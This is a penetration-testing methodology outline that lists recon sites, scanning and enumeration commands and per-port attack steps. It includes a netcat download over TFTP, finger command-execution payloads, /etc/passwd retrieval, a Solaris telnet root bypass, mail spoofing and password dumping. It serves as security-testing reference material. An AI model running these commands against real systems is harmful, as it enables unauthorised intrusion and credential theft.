Penetration Testing Framework 0.58

1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1

1.1.1.1. cmd.exe

1.1.2. 2

1.1.2.1. echo off

1.1.2.2. command

1.1.2.3. echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. alternative functionality

1.2.5.1. objShell.Run "%comspec% /k c: & dir"

1.2.5.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"

1.2.5.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool

1.3.1.1. Reconnaissance

1.3.1.2. FileSystem Links

1.3.1.3. Common Dialogs

1.3.1.4. Application Handlers

1.3.1.5. Browser Plugins

1.3.1.6. iKAT Tools

1.4. AT Command - privilege escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k

1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10)

1.5.6.1. Save Image As

1.5.6.2. View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB

1.5.16. ALT+MINUS: ALT+SHIFT+TAB

2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication Method

3.1.2.1. Xauth

3.1.2.2. Xhost

3.2. X11 Exploitation

3.2.1. xwd

3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

3.2.2. Keystrokes

3.2.2.1. Received

3.2.2.2. Transmitted

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config

3.3.6.1. DisplayManager*authorize:on

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

12. http://secunia.com/advisories/search/?search=citrix

13. Pre-Inspection Visit - template

14. Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms, passive and active. A passive approach is always the best starting point, as it would normally not trigger intrusion detection systems and the other forms of protection afforded to the network; it usually involves discovering publicly available information using a web browser, newsgroups and similar sources. An active form is more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering attack.

14.1. Untitled

14.1.1. Authoritative Bodies

14.1.1.1. IANA - Internet Assigned Numbers Authority

14.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

14.1.1.3. NRO - Number Resource Organisation

14.1.1.4. RIR - Regional Internet Registry

14.1.1.4.1. AFRINIC - African Network Information Centre

14.1.1.4.2. APNIC - Asia Pacific Network Information Centre

14.1.1.4.3. ARIN - American Registry for Internet Numbers

14.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

14.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre

14.1.2. Websites

14.1.2.1. Central Ops

14.1.2.1.1. Domain Dossier

14.1.2.1.2. Email Dossier

14.1.2.2. DNS Stuff

14.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

14.1.2.3. Fixed Orbit

14.1.2.3.1. Autonomous System lookups and other online tools available.

14.1.2.4. Geektools

14.1.2.5. IP2Location

14.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

14.1.2.6. Kartoo

14.1.2.6.1. Metasearch engine that visually presents its results.

14.1.2.7. MyIPNeighbors.com

14.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution

14.1.2.8. My-IP-Neighbors.com

14.1.2.8.1. Excellent site that can be used if the above is down

14.1.2.9. myipneighbors.net

14.1.2.10. Netcraft

14.1.2.10.1. Online search tool allowing queries for host information.

14.1.2.11. Passive DNS Replication

14.1.2.11.1. Finds shared domains based on supplied IP addresses

14.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

14.1.2.12. Robtex

14.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

14.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

14.1.2.13. Traceroute.org

14.1.2.13.1. Website listing a large number of links to online traceroute resources.

14.1.2.14. Wayback Machine

14.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

14.1.2.15. Whois.net

14.1.3. Tools

14.1.3.1. Cheops-ng

14.1.3.2. Country whois

14.1.3.3. Domain Research Tool

14.1.3.4. Firefox Plugins

14.1.3.4.1. AS Number

14.1.3.4.2. Shazou

14.1.3.4.3. Firecat Suite

14.1.3.5. Gnetutil

14.1.3.6. Goolag Scanner

14.1.3.7. Greenwich

14.1.3.8. Maltego

14.1.3.9. GTWhois

14.1.3.10. Sam Spade

14.1.3.11. Smart whois

14.1.3.12. SpiderFoot

14.2. Internet Search

14.2.1. General Information

14.2.1.1. Web Investigator

14.2.1.2. Tracesmart

14.2.1.3. Friends Reunited

14.2.1.4. Ebay - profiles etc.

14.2.2. Financial

14.2.2.1. EDGAR - Company information, including real-time filings. US

14.2.2.2. Google Finance - General Finance Portal

14.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

14.2.2.4. Companies House UK

14.2.2.5. Land Registry UK

14.2.3. Phone book/ Electoral Roll Information

14.2.3.1. 123people

14.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

14.2.3.2. 192.com

14.2.3.2.1. Electoral Roll Search. UK

14.2.3.3. 411

14.2.3.3.1. Online White Pages and Yellow Pages. US

14.2.3.4. Untitled

14.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

14.2.3.5. BT.com. UK

14.2.3.5.1. Residential

14.2.3.5.2. Business

14.2.3.6. Pipl

14.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

14.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

14.2.3.7. Spokeo

14.2.3.7.1. http://www.spokeo.com/user?q=domain_name

14.2.3.7.2. http://www.spokeo.com/user?q=email_address

14.2.3.8. Yasni

14.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

14.2.3.9. Zabasearch

14.2.3.9.1. People Search Engine. US

14.2.4. Generic Web Searching

14.2.4.1. Code Search

14.2.4.2. Forum Entries

14.2.4.3. Google Hacking Database

14.2.4.4. Google

14.2.4.4.1. Email Addresses

14.2.4.4.2. Contact Details

14.2.4.5. Newsgroups/forums

14.2.4.6. Blog Search

14.2.4.6.1. Yammer

14.2.4.6.2. Google Blog Search

14.2.4.6.3. Technorati

14.2.4.6.4. Jaiku

14.2.4.6.5. Present.ly

14.2.4.6.6. Twitter Network Browser

14.2.4.7. Search Engine Comparison/ Aggregator Sites

14.2.4.7.1. Clusty

14.2.4.7.2. Grokker

14.2.4.7.3. Zuula

14.2.4.7.4. Exalead

14.2.4.7.5. Delicious

14.2.5. Metadata Search

14.2.5.1. Untitled

14.2.5.1.1. MetaData Visualisation Sites

14.2.5.1.2. Tools

14.2.5.1.3. Wikipedia Metadata Search

14.2.6. Social/ Business Networks

14.2.6.1. Untitled

14.2.6.1.1. Africa

14.2.6.1.2. Australia

14.2.6.1.3. Belgium

14.2.6.1.4. Holland

14.2.6.1.5. Hungary

14.2.6.1.6. Iran

14.2.6.1.7. Japan

14.2.6.1.8. Korea

14.2.6.1.9. Poland

14.2.6.1.10. Russia

14.2.6.1.11. Sweden

14.2.6.1.12. UK

14.2.6.1.13. US

14.2.6.1.14. Assorted

14.2.7. Resources

14.2.7.1. OSINT

14.2.7.2. International Directory of Search Engines

14.3. DNS Record Retrieval from publicly available servers

14.3.1. Types of Information Records

14.3.1.1. SOA Records - Indicates the server that has authority for the domain.

14.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

14.3.1.3. NS Records - List of a host’s or domain’s name server(s).

14.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

14.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.

14.3.1.6. SRV Records - Service location record.

14.3.1.7. HINFO Records - Host information record with CPU type and operating system.

14.3.1.8. TXT Records - Generic text record.

14.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

14.3.1.10. RP - Responsible person for the domain.

14.3.2. Database Settings

14.3.2.1. Version.bind

14.3.2.2. Serial

14.3.2.3. Refresh

14.3.2.4. Retry

14.3.2.5. Expiry

14.3.2.6. Minimum

14.3.3. Sub Domains

14.3.4. Internal IP ranges

14.3.4.1. Reverse DNS for IP Range

14.3.5. Zone Transfer

14.4. Social Engineering

14.4.1. Remote

14.4.1.1. Phone

14.4.1.1.1. Scenarios

14.4.1.1.2. Results

14.4.1.1.3. Contact Details

14.4.1.2. Email

14.4.1.2.1. Scenarios

14.4.1.2.2. Software

14.4.1.2.3. Results

14.4.1.2.4. Contact Details

14.4.1.3. Other

14.4.2. Local

14.4.2.1. Personas

14.4.2.1.1. Name

14.4.2.1.2. Phone

14.4.2.1.3. Email

14.4.2.1.4. Business Cards

14.4.2.2. Contact Details

14.4.2.2.1. Name

14.4.2.2.2. Phone number

14.4.2.2.3. Email

14.4.2.2.4. Room number

14.4.2.2.5. Department

14.4.2.2.6. Role

14.4.2.3. Scenarios

14.4.2.3.1. New IT employee

14.4.2.3.2. Fire Inspector

14.4.2.4. Results

14.4.2.5. Maps

14.4.2.5.1. Satellite Imagery

14.4.2.5.2. Building layouts

14.4.2.6. Other

14.5. Dumpster Diving

14.5.1. Rubbish Bins

14.5.2. Contract Waste Removal

14.5.3. Ebay ex-stock sales i.e. HDD

14.6. Web Site copy

14.6.1. httrack

14.6.2. teleport pro

14.6.3. Black Widow

15. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system in use on a remote host by analysing packets received from that host. There are two distinct ways to fingerprint an OS: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it sends packets to the remote host and waits for a reply (or the lack of one). Different operating systems respond differently to certain types of packet (the response is governed by the relevant RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the stack), so custom packets may be sent to elicit those differences. The remote applications being served on a host can be determined from the open ports on that host; by port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
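
The passive approach described above, as an added example that is not part of the original framework or of any tool it lists: it parses a raw IPv4+TCP SYN (no link-layer header), extracts the fields a passive fingerprinter keys on (initial-TTL estimate, window size, MSS, window scale and TCP option order), and matches them against a small constructed signature table in the style of p0f. The signatures and the sample packets are constructed for illustration; the same logic lets a defender inventory the operating systems talking on a segment without sending a packet.

```python
import struct
from typing import Dict, List, Optional, Tuple

# TCP option kinds (RFC 793, RFC 1323, RFC 2018)
MSS, WSCALE, SACK_OK, TIMESTAMP = 2, 3, 4, 8
KIND_NAMES = {MSS: "mss", WSCALE: "ws", SACK_OK: "sok", TIMESTAMP: "ts"}

# Constructed, illustrative signatures: (label, initial TTL, option order).
# Real databases (p0f, nmap) are far larger and also track window/MSS ratios.
SIGNATURES = [
    ("Linux 2.6+ (illustrative)", 64, "mss,sok,ts,nop,ws"),
    ("Windows 7+ (illustrative)", 128, "mss,nop,ws,nop,nop,sok"),
    ("Windows XP (illustrative)", 128, "mss,nop,nop,sok"),
]


def initial_ttl(observed: int) -> int:
    """Round an observed TTL up to the nearest common initial value; a
    passive observer only sees what is left after each router hop."""
    for guess in (32, 64, 128, 255):
        if observed <= guess:
            return guess
    return 255


def parse_tcp_options(raw: bytes) -> Tuple[List[str], Dict[str, int]]:
    """Return TCP option order plus MSS / window-scale values; a bad length
    ends the walk instead of raising, since junk on the wire is normal."""
    order: List[str] = []
    values: Dict[str, int] = {}
    i = 0
    while i < len(raw):
        kind = raw[i]
        if kind == 0:                       # end of option list
            order.append("eol")
            break
        if kind == 1:                       # one-byte NOP padding
            order.append("nop")
            i += 1
            continue
        if i + 1 >= len(raw):
            break
        length = raw[i + 1]
        if length < 2 or i + length > len(raw):
            break
        data = raw[i + 2:i + length]
        order.append(KIND_NAMES.get(kind, f"opt{kind}"))
        if kind == MSS and len(data) == 2:
            values["mss"] = struct.unpack("!H", data)[0]
        elif kind == WSCALE and len(data) == 1:
            values["ws"] = data[0]
        i += length
    return order, values


def fingerprint(packet: bytes) -> Optional[Dict[str, object]]:
    """Extract passive-fingerprint fields from a raw IPv4+TCP packet.
    Returns None unless it is a pure SYN, which carries the richest options."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    ttl, proto = packet[8], packet[9]
    if proto != 6 or len(packet) < ihl + 20:
        return None
    tcp = packet[ihl:]
    data_off = (tcp[12] >> 4) * 4
    if (tcp[13] & 0x3F) != 0x02:            # SYN only: no ACK/RST/FIN/PSH/URG
        return None
    window = struct.unpack("!H", tcp[14:16])[0]
    order, values = parse_tcp_options(tcp[20:data_off])
    return {"ittl": initial_ttl(ttl), "win": window,
            "opts": ",".join(order), **values}


def classify(fp: Optional[Dict[str, object]]) -> str:
    """Match a fingerprint against SIGNATURES."""
    if fp is None:
        return "not a SYN"
    for label, ittl, opts in SIGNATURES:
        if fp["ittl"] == ittl and fp["opts"] == opts:
            return label
    return "unknown"


def build_syn(ttl: int, window: int, options: bytes, flags: int = 0x02) -> bytes:
    """Construct a minimal IPv4+TCP segment for offline testing; checksums
    stay zero and nothing is ever sent."""
    options += b"\x00" * (-len(options) % 4)   # pad to a 32-bit boundary
    tcp_len = 20 + len(options)
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, (tcp_len // 4) << 4,
                      flags, window, 0, 0) + options
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0x1234, 0x4000,
                     ttl, 6, 0, bytes([10, 0, 0, 5]), bytes([10, 0, 0, 9]))
    return ip + tcp


# Constructed sample SYNs: Linux-style seen 7 hops away (TTL 57 -> 64) and
# Windows-style seen 9 hops away (TTL 119 -> 128).
LINUX_SYN = build_syn(57, 29200, b"\x02\x04\x05\xb4\x04\x02\x08\x0a"
                      + b"\x00" * 8 + b"\x01\x03\x03\x07")
WINDOWS_SYN = build_syn(119, 8192, b"\x02\x04\x05\xb4\x01\x03\x03\x08"
                        + b"\x01\x01\x04\x02")
```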

15.1. Default Port Lists

15.1.1. Windows

15.1.2. *nix

15.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

15.2.1. General Enumeration Tools

15.2.1.1. nmap

15.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml

15.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

15.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

15.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

15.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

15.2.1.2. netcat

15.2.1.2.1. nc -v -n IP_Address port

15.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

15.2.1.3. amap

15.2.1.3.1. amap -bqv 192.168.1.1 80

15.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

15.2.1.4. xprobe2

15.2.1.4.1. xprobe2 192.168.1.1

15.2.1.5. sinfp

15.2.1.5.1. ./sinfp.pl -i -p

15.2.1.6. nbtscan

15.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

15.2.1.7. hping

15.2.1.7.1. hping ip_address

15.2.1.8. scanrand

15.2.1.8.1. scanrand ip_address:all

15.2.1.9. unicornscan

15.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

15.2.1.10. netenum

15.2.1.10.1. netenum network/netmask timeout

15.2.1.11. fping

15.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

15.2.2. Firewall Specific Tools

15.2.2.1. firewalk

15.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

15.2.2.2. ftester

15.2.2.2.1. On host 1: ./ftestd -i eth0 -v ; on host 2: ./ftest -f ftest.conf -v -d 0.01 ; then: ./freport ftest.log ftestd.log

15.2.3. Default Passwords (Examine list)

15.2.3.1. Passwords A

15.2.3.2. Passwords B

15.2.3.3. Passwords C

15.2.3.4. Passwords D

15.2.3.5. Passwords E

15.2.3.6. Passwords F

15.2.3.7. Passwords G

15.2.3.8. Passwords H

15.2.3.9. Passwords I

15.2.3.10. Passwords J

15.2.3.11. Passwords K

15.2.3.12. Passwords L

15.2.3.13. Passwords M

15.2.3.14. Passwords N

15.2.3.15. Passwords O

15.2.3.16. Passwords P

15.2.3.17. Passwords R

15.2.3.18. Passwords S

15.2.3.19. Passwords T

15.2.3.20. Passwords U

15.2.3.21. Passwords V

15.2.3.22. Passwords W

15.2.3.23. Passwords X

15.2.3.24. Passwords Y

15.2.3.25. Passwords Z

15.2.3.26. Passwords (Numeric)

15.3. Active Hosts

15.3.1. Open TCP Ports

15.3.2. Closed TCP Ports

15.3.3. Open UDP Ports

15.3.4. Closed UDP Ports

15.3.5. Service Probing

15.3.5.1. SMTP Mail Bouncing

15.3.5.2. Banner Grabbing

15.3.5.2.1. Other

15.3.5.2.2. HTTP

15.3.5.2.3. HTTPS

15.3.5.2.4. SMTP

15.3.5.2.5. POP3

15.3.5.2.6. FTP

15.3.6. ICMP Responses

15.3.6.1. Type 3 (Port Unreachable)

15.3.6.2. Type 8 (Echo Request)

15.3.6.3. Type 13 (Timestamp Request)

15.3.6.4. Type 15 (Information Request)

15.3.6.5. Type 17 (Subnet Address Mask Request)

15.3.6.6. Responses from broadcast address

15.3.7. Source Port Scans

15.3.7.1. TCP/UDP 53 (DNS)

15.3.7.2. TCP 20 (FTP Data)

15.3.7.3. TCP 80 (HTTP)

15.3.7.4. TCP/UDP 88 (Kerberos)

15.3.8. Firewall Assessment

15.3.8.1. Firewalk

15.3.8.2. TCP/UDP/ICMP responses

15.3.9. OS Fingerprint

16. Enumeration

16.1. Daytime port 13 open

16.1.1. nmap nse script

16.1.1.1. daytime

16.2. FTP port 21 open

16.2.1. Fingerprint server

16.2.1.1. telnet ip_address 21 (Banner grab)

16.2.1.2. Run command ftp ip_address

16.2.1.3. [email protected]

16.2.1.4. Check for anonymous access

16.2.1.4.1. ftp ip_address (Username: anonymous OR anon; Password: [email protected])

16.2.2. Password guessing

16.2.2.1. Hydra brute force

16.2.2.2. medusa

16.2.2.3. Brutus

16.2.3. Examine configuration files

16.2.3.1. ftpusers

16.2.3.2. ftp.conf

16.2.3.3. proftpd.conf

16.2.4. MiTM

16.2.4.1. pasvagg.pl

16.3. SSH port 22 open

16.3.1. Fingerprint server

16.3.1.1. telnet ip_address 22 (banner grab)

16.3.1.2. scanssh

16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

16.3.2. Password guessing

16.3.2.1. ssh [email protected]_address

16.3.2.2. guess-who

16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

16.3.2.3. Hydra brute force

16.3.2.4. brutessh

16.3.2.5. Ruby SSH Bruteforcer

16.3.3. Examine configuration files

16.3.3.1. ssh_config

16.3.3.2. sshd_config

16.3.3.3. authorized_keys

16.3.3.4. ssh_known_hosts

16.3.3.5. .shosts

16.3.4. SSH Client programs

16.3.4.1. tunnelier

16.3.4.2. winsshd

16.3.4.3. putty

16.3.4.4. winscp

16.4. Telnet port 23 open

16.4.1. Fingerprint server

16.4.1.1. telnet ip_address

16.4.1.1.1. Common Banner List (OS: Banner)

16.4.1.1.1.1. Solaris 8: SunOS 5.8

16.4.1.1.1.2. Solaris 2.6: SunOS 5.6

16.4.1.1.1.3. Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)

16.4.1.1.1.4. SunOS 4.1.x: SunOS Unix (hostname)

16.4.1.1.1.5. FreeBSD: FreeBSD/i386 (hostname) (ttyp1)

16.4.1.1.1.6. NetBSD: NetBSD/i386 (hostname) (ttyp1)

16.4.1.1.1.7. OpenBSD: OpenBSD/i386 (hostname) (ttyp1)

16.4.1.1.1.8. Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)

16.4.1.1.1.9. Debian 3.0: Debian GNU/Linux 3.0 / hostname

16.4.1.1.1.10. SGI IRIX 6.x: IRIX (hostname)

16.4.1.1.1.11. IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.

16.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.

16.4.1.1.1.13. Nokia IPSO: IPSO (hostname) (ttyp0)

16.4.1.1.1.14. Cisco IOS: User Access Verification

16.4.1.1.1.15. Livingston ComOS: ComOS - Livingston PortMaster

16.4.1.2. telnetfp

16.4.2. Password Attack

16.4.2.2. Brutus

16.4.2.3. Hydra brute force

16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

16.4.3. Examine configuration files

16.4.3.1. /etc/xinetd.d/telnet

16.4.3.2. /etc/xinetd.d/stelnet

16.5. Sendmail Port 25 open

16.5.1. Fingerprint server

16.5.1.1. telnet ip_address 25 (banner grab)

16.5.2. Mail Server Testing

16.5.2.1. Enumerate users

16.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

16.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

16.5.2.2. Mail Spoof Test

16.5.2.2.1. HELO anything / MAIL FROM: spoofed_address / RCPT TO: valid_mail_account / DATA / . / QUIT

16.5.2.3. /etc/inetd.conf

16.5.2.4. Mail Relay Test

16.5.3. Examine Configuration Files

16.5.3.1. sendmail.cf

16.5.3.2. submit.cf

16.6. DNS port 53 open

16.6.1. Fingerprint server/ service

16.6.1.1. host

16.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]

16.6.1.1.1.1. -v verbose format

16.6.1.1.1.2. -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.

16.6.1.1.1.3. -a Same as -t ANY.

16.6.1.1.1.4. -l Zone transfer (if allowed).

16.6.1.1.1.5. -f Save to a specified filename.

16.6.1.2. nslookup

16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

16.6.1.3. dig

16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

16.6.1.4. whois

16.6.1.4.1. -h Use the named host to resolve the query

16.6.1.4.2. -a Use ARIN to resolve the query

16.6.1.4.3. -r Use RIPE to resolve the query

16.6.1.4.4. -p Use APNIC to resolve the query

16.6.1.4.5. -Q Perform a quick lookup

16.6.2. DNS Enumeration

16.6.2.1. Bile Suite

16.6.2.1.1. perl BiLE.pl [website] [project_name]

16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

16.6.2.1.5. perl exp-tld.pl [input file] [output file]

16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

16.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]

16.6.2.2. txdns

16.6.2.2.1. txdns -rt -t domain_name

16.6.2.2.2. txdns -x 50 -bb domain_name

16.6.2.3. nmap nse scripts

16.6.2.3.1. dns-random-srcport

16.6.2.3.2. dns-random-txid

16.6.2.3.3. dns-recursion

16.6.2.3.4. dns-zone-transfer

16.6.3. Examine Configuration Files

16.6.3.1. host.conf

16.6.3.2. resolv.conf

16.6.3.3. named.conf

16.7. perl qtrace.pl [ip_address_file] [output_file]

16.8. TFTP port 69 open

16.8.1. TFTP Enumeration

16.8.1.1. tftp ip_address PUT local_file

16.8.1.2. tftp ip_address GET conf.txt (or other files)

16.8.1.3. Solarwinds TFTP server

16.8.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)

16.8.2. TFTP Bruteforcing

16.8.2.1. TFTP bruteforcer

16.8.2.2. Cisco-Torch

16.9. Finger Port 79 open

16.9.1. User enumeration

16.9.1.1. finger 'a b c d e f g h' @example.com

16.9.1.2. finger adm[email protected]

16.9.1.3. finger [email protected]

16.9.1.4. finger [email protected]

16.9.1.5. finger [email protected]

16.9.1.6. finger **@example.com

16.9.1.7. finger [email protected]

16.9.1.8. finger @example.com

16.9.1.9. nmap nse script

16.9.1.9.1. finger

16.9.2. Command execution

16.9.2.1. finger "|/bin/[email protected]"

16.9.2.2. finger "|/bin/ls -a /@example.com"

16.9.3. Finger Bounce

16.9.3.1. finger [email protected]@victim

16.9.3.2. finger @[email protected]

16.10. Web Ports 80,8080 etc. open

16.10.1. Fingerprint server

16.10.1.1. Telnet ip_address port

16.10.1.2. Firefox plugins

16.10.1.2.1. All

16.10.1.2.2. Specific

16.10.2. Crawl website

16.10.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)

16.10.2.2. httprint

16.10.2.3. Metagoofil

16.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

16.10.3. Web Directory enumeration

16.10.3.1. Nikto

16.10.3.1.1. nikto [-h target] [options]

16.10.3.2. DirBuster

16.10.3.3. Wikto

16.10.3.4. Goolag Scanner

16.10.4. Vulnerability Assessment

16.10.4.1. Manual Tests

16.10.4.1.1. Default Passwords

16.10.4.1.2. Install Backdoors

16.10.4.1.3. Method Testing

16.10.4.1.4. Upload Files

16.10.4.1.5. View Page Source

16.10.4.1.6. Input Validation Checks

16.10.4.1.7. Automated table and column iteration

16.10.4.2. Vulnerability Scanners

16.10.4.2.1. Acunetix

16.10.4.2.2. Grendelscan

16.10.4.2.3. NStealth

16.10.4.2.4. Obiwan III

16.10.4.2.5. w3af

16.10.4.3. Specific Applications/ Server Tools

16.10.4.3.1. Domino

16.10.4.3.2. Joomla

16.10.4.3.3. aspaudit.pl

16.10.4.3.4. Vbulletin

16.10.4.3.5. ZyXel

16.10.5. Proxy Testing

16.10.5.1. Burpsuite

16.10.5.2. Crowbar

16.10.5.3. Interceptor

16.10.5.4. Paros

16.10.5.5. Requester Raw

16.10.5.6. Suru

16.10.5.7. WebScarab

16.10.6. Examine configuration files

16.10.6.1. Generic

16.10.6.1.1. Examine httpd.conf/ windows config files

16.10.6.2. JBoss

16.10.6.2.1. JMX Console http://<IP>:8080/jmx-console/

16.10.6.3. Joomla

16.10.6.3.1. configuration.php

16.10.6.3.2. diagnostics.php

16.10.6.3.3. joomla.inc.php

16.10.6.3.4. config.inc.php

16.10.6.4. Mambo

16.10.6.4.1. configuration.php

16.10.6.4.2. config.inc.php

16.10.6.5. Wordpress

16.10.6.5.1. setup-config.php

16.10.6.5.2. wp-config.php

16.10.6.6. ZyXel

16.10.6.6.1. /WAN.html (contains PPPoE ISP password)

16.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

16.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)

16.10.6.6.4. /Firewall_DefPolicy.html (Firewall)

16.10.6.6.5. /CF_Keyword.html (Content Filter)

16.10.6.6.6. /RemMagWWW.html (Remote MGMT)

16.10.6.6.7. /rpSysAdmin.html (System)

16.10.6.6.8. /LAN_IP.html (LAN)

16.10.6.6.9. /NAT_General.html (NAT)

16.10.6.6.10. /ViewLog.html (Logs)

16.10.6.6.11. /rpFWUpload.html (Tools)

16.10.6.6.12. /DiagGeneral.html (Diagnostic)

16.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)

16.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

16.10.6.6.15. Config Backups

16.10.7. Examine web server logs

16.10.7.1. c:\winnt\system32\Logfiles\W3SVC1

